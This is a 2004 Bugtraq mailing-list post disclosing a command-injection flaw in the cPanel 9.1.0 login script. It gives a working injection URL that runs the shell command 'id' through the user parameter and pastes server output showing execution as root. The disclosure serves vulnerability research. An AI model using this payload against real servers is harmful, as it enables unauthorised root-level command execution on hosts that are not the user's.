[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Cpanel 9.1.0 have a problem ?
From:       Arab VieruZ <arabviersus () hotmail ! com>
Date:       2004-03-12 18:00:28
Message-ID: 20040312180028.26227.qmail () www ! securityfocus ! com
[Download RAW message or body]



Hi all 

I found another problem in login script

http://www.xxx.com:2082/login/?user=|"`id`"|

it same the first it give ROOT & u can use "+" or "%20" without any problem :) ! lool

look @ this:


/*
sh: /var/cpanel/users/: is a directory sh: uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel): command not
found HTTP/1.0 401 Still Working Connection: close Set-Cookie: cprelogin=no;
path=/ Server: cpsrvd/9.1.0 Content-type: text/html
*/

uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Thanx

Arab VieruZ
Saudi Devilz Team

SAUDI ARABIA KSA :)

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic